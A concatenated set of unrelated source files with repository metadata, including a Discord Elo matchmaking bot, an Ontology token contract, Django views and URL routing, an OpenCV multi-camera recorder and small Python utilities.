[sym_overlay], \
[p1], \
[summaryTbl], \
[p2], \
[buy_overlay], [sell_overlay], \
[err_overlay], \
[p3], \
[retPlot], \
],sizing_mode='scale_width')
#],sizing_mode='stretch_both')
if not account: save1.disabled=True
else: save1.disabled=False
curdoc().add_root(l1)
curdoc().title = "P&L.AI"
if os.environ.get('DJANGO_DEVELOPMENT'): dj_URL = "http://127.0.0.1:8000/"
else: dj_URL = "http://pnlai-env.eba-b6bihwb7.us-west-2.elasticbeanstalk.com/"
curdoc().template_variables["logout"] = dj_URL + 'logout/'
curdoc().template_variables["login"] = dj_URL + 'pnlaiapp/user_login/'
curdoc().template_variables["register"] = dj_URL + 'pnlaiapp/register/'
def getTop(Str):
DF = None
tday = DT.now().strftime('%Y-%m-%d')
t_f1,t_fs = None,glob.glob('data/store/yf/{}_*.pkl'.format(Str))
if t_fs and len(t_fs)>0: t_f1 = max(t_fs, key=os.path.getctime)
if t_f1 and os.path.isfile(t_f1):
dtStr1 = t_f1.split('/store/yf/')[-1].split('.pkl')[0].split('_')[-1]
dt1 = (datetime.datetime.strptime(dtStr1,'%Y-%m-%d')).date()
if dt1 > (DT.today()-timedelta(days=30)).date():
DF = pd.read_pickle(t_f1)
return DF
def getSyms():
SymLs = []
gDF = getTop('gainers')
if isinstance(gDF, pd.DataFrame): SymLs.append(gDF.iloc[0]['Symbol'])
lDF = getTop('losers')
if isinstance(lDF, pd.DataFrame): SymLs.append(lDF.iloc[0]['Symbol'])
return SymLs
# assign actions
def main():
global account
# check if there is a list of initial syms
SymLs = []
args_g = curdoc().session_context.request.arguments
try: SymLs = [aa.decode("utf-8") for aa in args_g.get('Sym')]
except: SymLs = getSyms()
try: account = args_g.get('account')[0].decode("utf-8")
except: account = None
if SymLs: syms = ','.join(SymLs)
else: syms = "BTCUSD"
errBox.text = 'Starting lookup'
datePick1.value=(DT.now()-timedelta(days=nDaysAgo)).strftime('%Y-%m-%d')
datePick2.value=DT.now().strftime('%Y-%m-%d')
symBox.value = syms
lookupRecs(syms,"NA")
submit1.on_click(lookupRecs1)
#submit2.on_click(lookupRecs2)
save1.on_click(saveStrat)
stratBox.on_change('value', populateParams)
assemble_page()
errBox.text = 'Completed lookup'
if __name__ == '__main__':
if log.DEBUG>=log.getLogger().getEffectiveLevel():
backtest="[STRATEGY],alphaName=WMA,buyCondition=lastClose<alpha and close>alpha,buyPrice=close,buyQuantity=1,sellCondition=lastClose>alpha and close<alpha,sellPrice=close,sellQuantity=1"
#backtest = "NA"
datePick1.value="2020-12-01";datePick2.value="2021-04-01"; lookupRecs("BTCUSD",backtest)
account='test'; saveStrat()
else:
main()
|
[
"varturas@gmail.com"
] |
varturas@gmail.com
|
476179284ddb1b7ce2743515ae21f53e49da1c46
|
5134cb3c4ba10eab149c98ea5fb58dc09b519422
|
/resumeroot/resumeroot/views.py
|
a274a58a021cea5bfe3da380dc8cc4effccb45a1
|
[] |
no_license
|
prakharg47/expresscv
|
3175de8696c8fb0df4e90d5671c1663d55340863
|
08600e870c59fb6298804e2ad0a06994808ec539
|
refs/heads/master
| 2021-06-18T20:10:51.600113
| 2019-07-03T07:43:18
| 2019-07-03T07:43:18
| 194,356,452
| 1
| 1
| null | 2021-06-10T21:37:19
| 2019-06-29T02:40:03
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 233
|
py
|
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from django.http import *
# Create your views here.
def home(request):
return render(request, 'resumeroot/home.html', context=None)
|
[
"prakhar.gupta@loylty.com"
] |
prakhar.gupta@loylty.com
|
a03ca7da4b114eb56f5900f813eb72c312b68436
|
6cc4608a0f414a592e45057c2694287a9abd5d0b
|
/Camera_Test/saveVideo.py
|
f3fae712c08cbbfc166c259804a1711621fae1d4
|
[] |
no_license
|
reaf-tamu/REAF-RoboSub-2018
|
b496d989b141d6be94002b85840e8bd91f193967
|
a96317f7792e80e1b1ae71faf89af45946a56107
|
refs/heads/master
| 2020-03-23T06:17:42.782195
| 2018-07-31T05:26:13
| 2018-07-31T05:26:13
| 141,201,550
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,332
|
py
|
import numpy as np
import cv2
cap = cv2.VideoCapture(0)
cap2 = cv2.VideoCapture(1)
cap3 = cv2.VideoCapture(2)
# Define the codec and create VideoWriter object
fourcc = cv2.VideoWriter_fourcc(*'XVID')
out = cv2.VideoWriter('outputDowny.avi',fourcc, 20.0, (640,480))
fourcc2 = cv2.VideoWriter_fourcc(*'XVID')
out2 = cv2.VideoWriter('outputFRy.avi',fourcc2, 20.0, (640,480))
fourcc3 = cv2.VideoWriter_fourcc(*'XVID')
out3 = cv2.VideoWriter('outputFLy.avi',fourcc3, 20.0, (640,480))
while(cap.isOpened()):
ret, frame = cap.read()
ret2, frame2 = cap2.read()
ret3, frame3 = cap3.read()
if ret==True:
out.write(frame)
cv2.imshow('frame',frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
if ret2==True:
out2.write(frame2)
cv2.imshow('frame2',frame2)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
if ret3==True:
out3.write(frame3)
cv2.imshow('frame3',frame3)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
else:
break
# Release everything if job is finished
cap.release()
cap2.release()
cap3.release()
out.release()
out2.release()
out3.release()
cv2.destroyAllWindows()
|
[
"hannahhut@tamu.edu"
] |
hannahhut@tamu.edu
|
1bc180cb4e0fa860acc4402a221464d973d7a86c
|
2f4137631026626bc758e826643628be9fcac58f
|
/bot/main.py
|
d86681c6d3ca503893510393a1631fc523574a18
|
[] |
no_license
|
Erebusaur/elo_bot
|
fe41928bc01b5f10f8560d46de5d72b2ed50110d
|
b228ca8d090fea7a4a4d461609ab356aa27684ab
|
refs/heads/master
| 2023-02-23T20:27:20.106382
| 2021-01-25T17:48:58
| 2021-01-25T17:48:58
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 16,628
|
py
|
import discord
import itertools
import math
import os
import requests
import time
import trueskill
from discord.ext import commands
from dotenv import load_dotenv
from state import State
from api import Api
from game import Game
from player import Player
intents = discord.Intents.default()
intents.members = True
bot = commands.Bot(command_prefix='?', intents=intents)
@bot.event
async def on_ready():
pass
def balance(queue):
size = len(queue) // 2
best_score = 0
best_teams = None
for team1 in itertools.combinations(queue[1:], size - 1):
team1 = queue[:1] + list(team1)
team2 = [x for x in queue if x not in team1]
team1_rating = list(map(lambda id: state.get_rating(id), team1))
team2_rating = list(map(lambda id: state.get_rating(id), team2))
score = trueskill.quality([team1_rating, team2_rating])
if score > best_score:
best_score = score
best_teams = (team1, team2)
return best_teams
async def start_game(ctx):
if ctx.channel.id not in state.allowed_channels:
return
queue = list(state.queue)
state.queue = set()
team1, team2 = balance(queue)
state.api.create_game(Game(team1, team2))
mentions = ""
description = "Team 1:\n"
for player_id in team1:
member = ctx.guild.get_member(player_id)
name = member.mention
# rating = state.get_conservative_rating(player_id)
# description += "{} {}\n".format(name, rating)
description += f"{name}\n"
mentions += "{} ".format(name)
description += "\nTeam 2:\n"
for player_id in team2:
member = ctx.guild.get_member(player_id)
name = member.mention
# rating = state.get_conservative_rating(player_id)
# description += "{} {}\n".format(name, rating)
description += f"{name}\n"
mentions += "{} ".format(name)
id = state.api.get_last_game().id
title = "Game #{} started".format(id)
embed = discord.Embed(title=title, description=description)
message = await ctx.send(mentions, embed=embed)
for player_id in team1:
try:
member = ctx.guild.get_member(player_id)
await member.send("Game started: {}".format(message.jump_url))
except:
pass
for player_id in team2:
try:
member = ctx.guild.get_member(player_id)
await member.send("Game started: {}".format(message.jump_url))
except:
pass
@bot.command()
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def rebalance(ctx):
game = api.get_last_game()
if not game:
return
team1, team2 = balance(game.team1 + game.team2)
game.team1 = team1
game.team2 = team2
api.update_game(game)
title = "Game #{}".format(game.id)
description = "Team 1:\n"
for player_id in team1:
member = ctx.guild.get_member(player_id)
name = member.mention
# rating = state.get_conservative_rating(player_id)
# description += "{} {}\n".format(name, rating)
description += f"{name}\n"
description += "\nTeam 2:\n"
for player_id in team2:
member = ctx.guild.get_member(player_id)
name = member.mention
# rating = state.get_conservative_rating(player_id)
# description += "{} {}\n".format(name, rating)
description += f"{name}\n"
embed = discord.Embed(title=title, description=description)
await ctx.send(embed=embed)
async def add_player(ctx, player: discord.User):
name = player.mention
try:
state.add_queue(player.id)
except KeyError:
await ctx.send(f"{name} is already in the queue.")
return
# rating = state.get_conservative_rating(player.id)
# title = "[{}/{}] {} ({}) joined the queue.".format(
# len(state.queue), 2 * state.team_size, name, rating)
title = "[{}/{}] {} joined the queue.".format(
len(state.queue), 2 * state.team_size, name)
embed = discord.Embed(description=title)
await ctx.send(embed=embed)
if len(state.queue) == 2 * state.team_size:
await start_game(ctx)
@bot.command(aliases=['j'])
async def join(ctx):
if ctx.channel.id not in state.allowed_channels:
return
if state.frozen:
await ctx.send("The queue is frozen.")
return
await add_player(ctx, ctx.author)
@bot.command()
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def forcejoin(ctx, user: discord.User):
if ctx.channel.id not in state.allowed_channels:
return
await add_player(ctx, user)
async def remove_player(ctx, player: discord.User):
name = player.mention
try:
state.remove_queue(player.id)
except KeyError:
await ctx.send(f"{name} is not in the queue.")
return
# rating = state.get_conservative_rating(player.id)
# description = "[{}/{}] {} ({}) left the queue.".format(
# len(state.queue), 2 * state.team_size, name, rating)
description = "[{}/{}] {} left the queue.".format(
len(state.queue), 2 * state.team_size, name)
embed = discord.Embed(description=description)
await ctx.send(embed=embed)
if len(state.queue) == 2 * state.team_size:
await start_game(ctx)
@bot.command(aliases=['l'])
async def leave(ctx):
if ctx.channel.id not in state.allowed_channels:
return
if state.frozen:
await ctx.send("The queue is frozen.")
return
await remove_player(ctx, ctx.author)
@bot.command()
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def forceremove(ctx, user: discord.User):
if ctx.channel.id not in state.allowed_channels:
return
await remove_player(ctx, user)
@bot.command()
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def players(ctx, n: int):
if ctx.channel.id not in state.allowed_channels:
return
if n < 1:
await ctx.send("First argument must be greater than 1.")
return
state.team_size = n
await ctx.send(f"Players per team set to {n}.")
if len(state.queue) == 2 * state.team_size:
await start_game(ctx)
@bot.command(aliases=['g'])
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def score(ctx, id: int, team: str):
if ctx.channel.id not in state.allowed_channels:
return
game = state.api.get_game_by_id(id)
if not game:
await ctx.send("This game does not exist.")
return
if team == '1':
result = '1'
elif team == '2':
result = '2'
elif team == 'draw':
result = 'D'
else:
await ctx.send("Score must be 1, 2 or draw.")
return
game.score = result
state.api.update_game(game)
state.update_players()
await ctx.send(f"Game {id} updated.")
@bot.command(aliases=['cancel'])
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def cancelgame(ctx, id: int):
if ctx.channel.id not in state.allowed_channels:
return
game = state.api.get_game_by_id(id)
if not game:
await ctx.send("This game does not exist.")
return
game.score = 'C'
state.api.update_game(game)
state.update_players()
@bot.command(aliases=['lb'])
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def leaderboard(ctx, page=1):
if ctx.channel.id not in state.allowed_channels:
return
players = list(
filter(lambda x: x[0], map(lambda x: (ctx.guild.get_member(x), state.get_rating(x)), state.players.keys())))
players = sorted(players, key=lambda x: -(x[1].mu - 2 * x[1].sigma))
pages = math.ceil(len(players) / 20)
if page > pages:
return
start = 20 * (page - 1)
description = ""
for (i, player) in enumerate(players[start:start+20], start + 1):
name = player[0]
rating = round(100 * (player[1].mu - 2 * player[1].sigma))
mu = round(100 * player[1].mu)
sigma = round(200 * player[1].sigma)
description += "{}: {} - **{}** ({} ± {})\n".format(
i, name.mention, rating, mu, sigma)
embed = discord.Embed(
title=f"Leaderboard ({page}/{pages})", description=description)
await ctx.send(embed=embed)
@bot.command(aliases=['q'])
async def queue(ctx):
if ctx.channel.id not in state.allowed_channels:
return
last_game = state.api.get_last_game()
if last_game:
id = last_game.id + 1
else:
id = 1
title = "Game #{} [{}/{}]".format(id, len(state.queue),
2 * state.team_size)
description = ""
for player_id in state.queue:
name = ctx.guild.get_member(player_id).mention
# rating = state.get_conservative_rating(player_id)
# description += "{} ({})\n".format(name, rating)
description += "{}\n".format(name)
embed = discord.Embed(title=title, description=description)
await ctx.send(embed=embed)
async def _gameinfo(ctx, game: Game):
title = "Game #{}".format(game.id)
winner = "undecided"
if game.score == "1":
winner = "team 1"
elif game.score == "2":
winner = "team 2"
elif game.score == "D":
winner = "draw"
elif game.score == "C":
winner = "cancelled"
description = "{}\n\nWinner: {}\n\nTeam 1:".format(game.date[:-1], winner)
for player in game.team1:
name = "<@" + str(player) + ">"
description += "\n{}".format(name)
description += "\n\nTeam 2:"
for player in game.team2:
name = "<@" + str(player) + ">"
description += "\n{}".format(name)
embed = discord.Embed(title=title, description=description)
await ctx.send(embed=embed)
@bot.command()
async def lastgame(ctx):
if ctx.channel.id not in state.allowed_channels:
return
game = state.api.get_last_game()
if not game:
await ctx.send("No game was played.")
return
await _gameinfo(ctx, game)
@bot.command()
async def gameinfo(ctx, id: int):
if ctx.channel.id not in state.allowed_channels:
return
game = state.api.get_game_by_id(id)
if not game:
await ctx.send("This game does not exist.")
return
await _gameinfo(ctx, game)
@bot.command()
# @commands.has_any_role('Scrim Organiser', 'Moderator')
async def info(ctx, user: discord.User = None):
if ctx.channel.id not in state.allowed_channels and not isinstance(ctx.channel, discord.channel.DMChannel):
return
if not user:
user = ctx.author
else:
try:
roles = list(map(lambda x: x.name, ctx.author.roles))
if not ('Scrim Organiser' in roles or 'Moderator' in roles):
return
except:
return
games = state.api.get_games(user.id)
wins = 0
losses = 0
draws = 0
for game in games:
if game.score == "1":
if user.id in game.team1:
wins += 1
else:
losses += 1
elif game.score == "2":
if user.id in game.team2:
wins += 1
else:
losses += 1
elif game.score == "D":
draws += 1
rating = state.get_rating(user.id)
mu = round(100 * rating.mu)
sigma = round(200 * rating.sigma)
rating = state.get_conservative_rating(user.id)
title = "{}'s stats".format(user.display_name)
description = "Rating: {} ({}±{})\n".format(
rating, mu, sigma)
description += f"Wins: {wins}\n"
description += f"Losses: {losses}\n"
description += f"Draws: {draws}\n"
description += "Games: {}\n".format(wins + losses + draws)
embed = discord.Embed(title=title, description=description)
await ctx.send(embed=embed)
@bot.command()
async def gamelist(ctx, user: discord.User = None):
if ctx.channel.id not in state.allowed_channels:
return
if user:
title = "{}'s last games".format(user.display_name)
last_games = state.api.get_games(user.id)[-20:][::-1]
description = ""
for game in last_games:
result = "undecided"
if game.score == "1":
if user.id in game.team1:
result = "win"
else:
result = "loss"
elif game.score == "2":
if user.id in game.team2:
result = "win"
else:
result = "loss"
elif game.score == "D":
result = "draw"
elif game.score == "C":
result = "cancelled"
description += "Game #{}: {}\n".format(game.id, result)
else:
title = "Last games"
last_games = state.api.get_games()[-20:][::-1]
description = ""
for game in last_games:
result = "undecided"
if game.score == "1":
result = "team 1"
elif game.score == "2":
result = "team 2"
elif game.score == "D":
result = "draw"
elif game.score == "C":
result = "cancelled"
description += "Game #{}: {}\n".format(game.id, result)
embed = discord.Embed(title=title, description=description)
await ctx.send(embed=embed)
@bot.command()
async def stats(ctx):
if ctx.channel.id not in state.allowed_channels:
return
games = state.api.get_games()
total_games = len(games)
draws = 0
cancelled = 0
ongoing = 0
for game in games:
if game.score == "C":
cancelled_games += 1
elif game.score == "D":
draws += 1
elif not game.score:
ongoing += 1
title = "Stats"
description = "Total games: {}\n".format(total_games)
description += "Games played: {}\n".format(
total_games - cancelled - ongoing)
description += "Cancelled games: {}\n".format(cancelled)
description += "Undecided games: {}\n".format(ongoing)
# description += "Draws: {}\n".format(draws)
embed = discord.Embed(title=title, description=description)
await ctx.send(embed=embed)
@bot.command()
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def swap(ctx, user1: discord.User, user2: discord.User):
if ctx.channel.id not in state.allowed_channels:
return
game = state.api.get_last_game()
if user1.id in game.team1:
if user2.id in game.team1:
await ctx.send("These players are on the same team.")
return
elif user2.id in game.team2:
game.team1 = [x if x != user1.id else user2.id for x in game.team1]
game.team2 = [x if x != user2.id else user1.id for x in game.team2]
else:
game.team1 = [x if x != user1.id else user2.id for x in game.team1]
elif user1.id in game.team2:
if user2.id in game.team2:
await ctx.send("These players are on the same team.")
return
elif user2.id in game.team1:
game.team1 = [x if x != user2.id else user1.id for x in game.team1]
game.team2 = [x if x != user1.id else user2.id for x in game.team2]
else:
game.team2 = [x if x != user1.id else user2.id for x in game.team2]
else:
await ctx.send("{} is not playing.".format(user1.mention))
return
state.api.update_game(game)
await ctx.send("Players swapped.")
if game.score in ["1", "2", "D"]:
state.update_players()
@bot.command(aliases=['clear', 'clearq'])
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def clearqueue(ctx):
state.queue = set()
await ctx.send("Queue cleared.")
@bot.command()
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def freeze(ctx):
state.frozen = True
await ctx.send("Queue frozen.")
@bot.command()
@commands.has_any_role('Scrim Organiser', 'Moderator')
async def unfreeze(ctx):
state.frozen = False
await ctx.send("Queue unfrozen.")
load_dotenv()
api = Api("http://localhost:5000")
state = State(api)
state.update_players()
bot.run(os.getenv('DISCORD_TOKEN'))
|
[
"lucas.fenart@protonmail.com"
] |
lucas.fenart@protonmail.com
|
f9648b4e207e988d51a49712c2adc8d36c8d6d5c
|
6c34c19aa9ca94751acc3bd9c6d0548838ccce2b
|
/AbstractDeck.py
|
9642961a1c451f4ee027c216c60dd00b4ccbfc55
|
[
"MIT"
] |
permissive
|
mleyfman/abstract-card-game
|
d2614fb7fb1447e7349ae135d481fc9af3d73317
|
5f50508da7413306747a4c4d36891604794a4aeb
|
refs/heads/master
| 2016-09-05T23:51:52.336762
| 2014-08-03T16:26:28
| 2014-08-03T16:26:28
| 22,243,009
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 572
|
py
|
from random import *
class AbstractDeck:
"""Abstract class for shuffling and iterating over a collection of cards"""
def __init__(self, cards=None):
self.cards = cards
def __len__(self):
return len(cards)
def __iter__(self):
return iter(self.cards)
def shuffle(self):
"""Shuffles the deck with the Fisher-Yates shuffle"""
num_cards = len(self.cards)
for i in range(0, num_cards):
j = randint(i, num_cards - 1)
self.cards[i], self.cards[j] = self.cards[j], self.cards[i]
|
[
"mleyfman@me.com"
] |
mleyfman@me.com
|
f0e885af8f236263f6f0d54edcb919a801a52753
|
bc8e2bec970f67a8a0d1e0e2e8cbc83143503be3
|
/luckyMoon2/Lucky.py
|
97f3aee2c17a430f0cf04ab3ee0f211c1d7f2303
|
[] |
no_license
|
skyinglyh1/temporary-Moon
|
a7905361c69f9b54777e53e08a1ec1810859c8ff
|
d28b91267bec3f09c2e191283986aec469c1ffd8
|
refs/heads/master
| 2020-04-12T03:58:59.320725
| 2018-12-25T06:15:23
| 2018-12-25T06:15:23
| 162,281,188
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,036
|
py
|
"""
Lucky Contract
"""
from boa.interop.System.Storage import GetContext, Get, Put, Delete
from boa.interop.System.Runtime import Notify, CheckWitness
from boa.interop.System.Action import RegisterAction
from boa.builtins import concat, ToScriptHash
TransferEvent = RegisterAction("transfer", "from", "to", "amount")
ApprovalEvent = RegisterAction("approval", "owner", "spender", "amount")
ctx = GetContext()
NAME = 'LUCKY'
SYMBOL = 'LCY'
DECIMALS = 9
FACTOR = 1000000000
OWNER = ToScriptHash("AQf4Mzu1YJrhz9f3aRkkwSm9n3qhXGSh4p")
TOTAL_AMOUNT = 10000000000
BALANCE_PREFIX = bytearray(b'\x01')
APPROVE_PREFIX = b'\x02'
SUPPLY_KEY = 'TotalSupply'
def Main(operation, args):
"""
:param operation:
:param args:
:return:
"""
# 'init' has to be invokded first after deploying the contract to store the necessary and important info in the blockchain
if operation == 'init':
return init()
if operation == 'name':
return name()
if operation == 'symbol':
return symbol()
if operation == 'decimals':
return decimals()
if operation == 'totalSupply':
return totalSupply()
if operation == 'balanceOf':
if len(args) != 1:
return False
acct = args[0]
return balanceOf(acct)
if operation == 'transfer':
if len(args) != 3:
return False
else:
from_acct = args[0]
to_acct = args[1]
amount = args[2]
return transfer(from_acct,to_acct,amount)
if operation == 'transferMulti':
return transferMulti(args)
if operation == 'transferFrom':
if len(args) != 4:
return False
spender = args[0]
from_acct = args[1]
to_acct = args[2]
amount = args[3]
return transferFrom(spender,from_acct,to_acct,amount)
if operation == 'approve':
if len(args) != 3:
return False
owner = args[0]
spender = args[1]
amount = args[2]
return approve(owner,spender,amount)
if operation == 'allowance':
if len(args) != 2:
return False
owner = args[0]
spender = args[1]
return allowance(owner,spender)
if operation == 'burn':
if len(args) != 2:
return False
acct = args[0]
amount = args[1]
return burn(acct, amount)
return False
def init():
"""
initialize the contract, put some important info into the storage in the blockchain
:return:
"""
if len(OWNER) != 20:
Notify(["Owner illegal!"])
return False
if Get(ctx,SUPPLY_KEY):
Notify("Already initialized!")
return False
else:
total = TOTAL_AMOUNT * FACTOR
Put(ctx,SUPPLY_KEY,total)
Put(ctx,concat(BALANCE_PREFIX,OWNER),total)
TransferEvent("", OWNER, total)
return True
def name():
"""
:return: name of the token
"""
return NAME
def symbol():
"""
:return: symbol of the token
"""
return SYMBOL
def decimals():
"""
:return: the decimals of the token
"""
return DECIMALS
def totalSupply():
"""
:return: the total supply of the token
"""
return Get(ctx, SUPPLY_KEY)
def balanceOf(account):
"""
:param account:
:return: the token balance of account
"""
if len(account) != 20:
raise Exception("address length error")
return Get(ctx,concat(BALANCE_PREFIX,account))
def transfer(from_acct,to_acct,amount):
"""
Transfer amount of tokens from from_acct to to_acct
:param from_acct: the account from which the amount of tokens will be transferred
:param to_acct: the account to which the amount of tokens will be transferred
:param amount: the amount of the tokens to be transferred, >= 0
:return: True means success, False or raising exception means failure.
"""
if len(to_acct) != 20 or len(from_acct) != 20:
raise Exception("address length error")
if CheckWitness(from_acct) == False or amount < 0:
return False
fromKey = concat(BALANCE_PREFIX,from_acct)
fromBalance = Get(ctx,fromKey)
if amount > fromBalance:
return False
if amount == fromBalance:
Delete(ctx,fromKey)
else:
Put(ctx,fromKey,fromBalance - amount)
toKey = concat(BALANCE_PREFIX,to_acct)
toBalance = Get(ctx,toKey)
Put(ctx,toKey,toBalance + amount)
# Notify(["transfer", AddressToBase58(from_acct), AddressToBase58(to_acct), amount])
# TransferEvent(AddressToBase58(from_acct), AddressToBase58(to_acct), amount)
TransferEvent(from_acct, to_acct, amount)
return True
def transferMulti(args):
"""
:param args: the parameter is an array, containing element like [from, to, amount]
:return: True means success, False or raising exception means failure.
"""
for p in args:
if len(p) != 3:
# return False is wrong
raise Exception("transferMulti params error.")
if transfer(p[0], p[1], p[2]) == False:
# return False is wrong since the previous transaction will be successful
raise Exception("transferMulti failed.")
return True
def approve(owner,spender,amount):
"""
owner allow spender to spend amount of token from owner account
Note here, the amount should be less than the balance of owner right now.
:param owner:
:param spender:
:param amount: amount>=0
:return: True means success, False or raising exception means failure.
"""
if len(spender) != 20 or len(owner) != 20:
raise Exception("address length error")
if CheckWitness(owner) == False:
return False
if amount > balanceOf(owner) or amount < 0:
return False
key = concat(concat(APPROVE_PREFIX,owner),spender)
Put(ctx, key, amount)
# Notify(["approval", AddressToBase58(owner), AddressToBase58(spender), amount])
# ApprovalEvent(AddressToBase58(owner), AddressToBase58(spender), amount)
ApprovalEvent(owner, spender, amount)
return True
def transferFrom(spender,from_acct,to_acct,amount):
"""
spender spends amount of tokens on the behalf of from_acct, spender makes a transaction of amount of tokens
from from_acct to to_acct
:param spender:
:param from_acct:
:param to_acct:
:param amount:
:return:
"""
if len(spender) != 20 or len(from_acct) != 20 or len(to_acct) != 20:
raise Exception("address length error")
if CheckWitness(spender) == False:
return False
fromKey = concat(BALANCE_PREFIX, from_acct)
fromBalance = Get(ctx, fromKey)
if amount > fromBalance or amount < 0:
return False
approveKey = concat(concat(APPROVE_PREFIX,from_acct),spender)
approvedAmount = Get(ctx,approveKey)
toKey = concat(BALANCE_PREFIX,to_acct)
if amount > approvedAmount:
return False
elif amount == approvedAmount:
Delete(ctx,approveKey)
Put(ctx, fromKey, fromBalance - amount)
else:
Put(ctx,approveKey,approvedAmount - amount)
Put(ctx, fromKey, fromBalance - amount)
toBalance = Get(ctx, toKey)
Put(ctx, toKey, toBalance + amount)
TransferEvent(from_acct, to_acct, amount)
return True
def allowance(owner,spender):
"""
check how many token the spender is allowed to spend from owner account
:param owner: token owner
:param spender: token spender
:return: the allowed amount of tokens
"""
key = concat(concat(APPROVE_PREFIX,owner),spender)
return Get(ctx,key)
def burn(account, amount):
if CheckWitness(account) == False or amount <= 0:
return False
if account != OWNER:
return False
acctBalance = balanceOf(account)
if acctBalance < amount:
return False
Put(ctx, concat(BALANCE_PREFIX, account), acctBalance - amount)
Put(ctx, SUPPLY_KEY, totalSupply() - amount)
TransferEvent(account, "", amount)
return True
|
[
"skyinglyh@gmail.com"
] |
skyinglyh@gmail.com
|
1804cfa845cafaff6ec953c7a7ed647e1d36d48e
|
904ff476a67cc6009c6eff83a6e81f50939e6570
|
/Practice_15_KM-04_Dubina/exp_root/root.py
|
81c71ab622932fd32a9ba7d7a7ed95e25d03ccbb
|
[] |
no_license
|
Dubina-03/Practice_university
|
70b028aac64b6719b6cab79550ff30535d01a13d
|
85731b317b766d1862e741e4dd527ae9722c9d0d
|
refs/heads/master
| 2023-02-03T14:59:40.145701
| 2020-12-24T19:27:32
| 2020-12-24T19:27:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 76
|
py
|
def root2(n):
return n**(1/2)
def root3(n):
return n**(1/3)
|
[
"noreply@github.com"
] |
Dubina-03.noreply@github.com
|
bac96bf490d83a70af03f523a3588c47d7f35390
|
1958631675a1eda1c2c5a018b636cb1117d90d9e
|
/0x0B-python-input_output/11-student.py
|
50bc5c0d66a5b52457b1d461d72eb5e1a35c3bd9
|
[] |
no_license
|
Valinor13/holbertonschool-higher_level_programming
|
f32d6507546584c3af59e3e8ece345af70a698d6
|
5fad6ea9f28f845820b5a893feb20e83ed3fe7b4
|
refs/heads/main
| 2023-06-05T21:15:29.774676
| 2021-06-27T23:08:54
| 2021-06-27T23:08:54
| 361,808,582
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 799
|
py
|
#!/usr/bin/python3
"""A module with the class Student"""
class Student:
"""A class that stores student with their records"""
def __init__(self, first_name, last_name, age):
self.first_name = first_name
self.last_name = last_name
self.age = age
def to_json(self, attrs=None):
a = {}
if attrs is None:
return vars(self)
if type(attrs) is str:
try:
a[attrs] = getattr(self, attrs)
return a
except:
pass
for item in attrs:
try:
a[item] = getattr(self, item)
except:
pass
return a
def reload_from_json(self, json):
for k in json:
setattr(self, k, json[k])
|
[
"jwcalhoun2@gmail.com"
] |
jwcalhoun2@gmail.com
|
04a569fb495fa2d6b69c5e3dd372fa47ef596909
|
d59fe0cad214cb7bfca9bf2e029f3475b3c01ea9
|
/Backend-django/project/urls.py
|
df49f604eef7e03dc24917b5e1c2b0168c6eb9d1
|
[] |
no_license
|
nidheesh977/django-ecommerce
|
8a82fd41e30b7154caa9bab810064b68aba7af34
|
53eeb0b10f23a4da2944f2591ed535db34bfa0dc
|
refs/heads/master
| 2023-08-06T02:37:57.732349
| 2021-10-06T12:00:58
| 2021-10-06T12:00:58
| 405,357,396
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,433
|
py
|
"""project URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.1/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from rest_framework_simplejwt.views import (
TokenObtainPairView,
TokenRefreshView,
)
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('products.urls', namespace = 'products')),
path('accounts/', include('accounts.urls', namespace = 'accounts')),
path('cart/', include('cart.urls', namespace = 'cart')),
path('checkout/', include("checkout.urls", namespace = "checkout")),
path('token/', TokenObtainPairView.as_view(), name='token_obtain_pair'),
path('token/refresh/', TokenRefreshView.as_view(), name='token_refresh'),
]
urlpatterns+=static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)
|
[
"bnidheesh844@gmail.com"
] |
bnidheesh844@gmail.com
|
e8c3fffdddd5e016a38f7ce0dfb435d2a43c62aa
|
a2cf879bcf9335c53157bfba71d889372fb492b8
|
/test/JsonTestResultTest.py
|
b44ee0d3744ea3faee8b5d8b32791265411c5850
|
[] |
no_license
|
colinsullivan/gaeunit
|
98ec6dc6ff0d37f2c6d89bdf2695b5049b647955
|
bab492355c69139cf1f06d14e5caa4e6ed35de39
|
refs/heads/master
| 2021-01-19T18:07:35.376204
| 2012-10-27T08:10:48
| 2012-10-27T08:10:48
| 1,329,594
| 3
| 1
| null | 2014-10-03T17:55:03
| 2011-02-04T21:18:40
|
Python
|
UTF-8
|
Python
| false
| false
| 853
|
py
|
'''
Created on May 6, 2009
@author: george
'''
import unittest
import gaeunit
class Test(unittest.TestCase):
tr = gaeunit.JsonTestResult()
def test_list(self):
testcase = MockTestCase()
list = [(testcase, "error")]
result_expected = [{"desc":"test","detail":"error"}]
result = self.tr._list(list)
self.assertEqual(result, result_expected)
